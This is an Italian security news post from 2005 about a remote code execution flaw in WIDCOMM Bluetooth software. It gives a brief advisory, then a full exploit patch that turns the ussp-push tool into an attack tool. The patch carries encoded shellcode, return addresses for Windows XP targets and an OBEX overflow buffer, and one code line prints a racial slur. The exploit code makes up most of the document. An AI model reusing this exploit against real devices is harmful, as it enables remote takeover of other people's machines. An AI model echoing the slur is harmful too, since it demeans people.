Security Wireless

VulnerabilitÓ WIDCOMM Bluetooth Communications Software

Articoli / Bug
Inviato da Nemesis 05 Dic 2005 - 17:21

Alcune vulnerabilitÓ sono state riscontrata nel software per comunicazioni Bluetooth WIDCOMM ...

Un remote user potrebbe eseguire codice arbitrario sul sistema terget.
E' stato riscontrato che un remote user mandando delle particolari richieste via Bluetooth sarebbe possibile eseguire codice arbitrario sul sistema.
Soluzione, eseguire l'upgrade alla versione 3.0.
E' disponibile inoltre un exploit per la vulnerabilitÓ remota :

--- ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500


@@ -1,4 +1,10 @@
/*
+ http://www.digitalmunition.com
+ Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest.
+ http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
* UNrooted.net example code
*
* Most of these functions are just rips from the Affix Bluetooth project OBEX


@@ -62,7 +68,10 @@

#include "obex_socket.h"

-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
#define BT_SERVICE "OBEX"
#define OBEX_PUSH 5



@@ -316,6 +325,9 @@
switch (event) {
case OBEX_EV_PROGRESS:
printf("Made some progress...\n");
+ sleep(3);
+ printf("Peace nigga...\n");
+ exit(0);
break;

case OBEX_EV_ABORT:


@@ -382,9 +394,7 @@
name = remote;

name_len = (strlen(name)+1)<<1;
- if( (namebuf = g_malloc(name_len)) ) {
- OBEX_CharToUnicode(namebuf, name, name_len);
- }
+ namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode.

buf = easy_readfile(path, &file_size);
if(buf == NULL) {


@@ -424,6 +434,24 @@
return err;
}

+static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual...
+{
+ int s = hci_open_dev(hdev);
+
+ if (s < 0) {
+ fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ if (opt) {
+ if (hci_write_local_name(s, opt, 2000) < 0) {
+ fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ }
+
+}

/*
* That's all there is to it. With it all setup like this all I have to do


@@ -434,19 +462,87 @@

int main( int argc, char **argv )
{
- if ( argc != 4 ) {
- printf("%s\n\n"
- "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
- "\tDEVICE = RFCOMM TTY device file\n"
- "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
- "\tLFILE = Local file path\n"
- "\tRFILE = Remote file name\n\n",
- UPUSH_APPNAME, argv[0]);
+/*
+ The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+ # Authentication and Encryption (Security Mode 3)
+ auth disable;
+ encrypt disable;
+*/
+
+ struct
+ {
+ char *os;
+ u_long ret;
+ }
+ targets[] =
+ {
+ { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+ { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+ { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+ { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+ { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+ { "[ Crash ]", 0x41424344 },
+ }, v;
+
+ if ( argc != 3 ) {
+ printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]);
+ printf("Types:\n");
+ int i;
+ for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+ printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
+
return( -1 );
}

- printf( "pushing file %s\n", argv[2] );
- if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+ /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+ /* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+ /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */
+ /* this still crashes the BTStackServer.exe... but oh well */
+ unsigned char scode[] =
+ "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
+ "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
+ "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
+ "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
+ "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
+ "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
+ "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
+ "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
+ "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
+ "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
+ "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
+ "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
+ "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
+ "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
+
+ set_device_name(0,0,scode);
+ //printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
+ //printf( "pushing file.\n");
+
+ char buf[3000];
+ memset(buf,'\0',sizeof(buf));
+ memset(buf,'Z',3); // Sometimes u need 3 z's
+
+ int type = atoi(argv[2]);
+ if(type)
+ {
+ printf("[-] Selected target:\n");
+ printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);
+ }
+
+ int x;
+ for(x=0; x<=122; x=x+1)
+ {
+ memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+ }
+ // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode
+ if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+ printf( "error\n" );
+ return( -1 );
+ }
+ printf("\nsleeping 3 seconds before triggering the shellcode\n");
+ sleep(3);
+ if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
printf( "error\n" );
return( -1 );
}

Questo articolo Ŕ stato inviato da Security Wireless
  http://www.securitywireless.info/

La URL di questo articolo Ŕ:
  http://www.securitywireless.info/modules.php?op=modload&name=News&file=article&sid=14765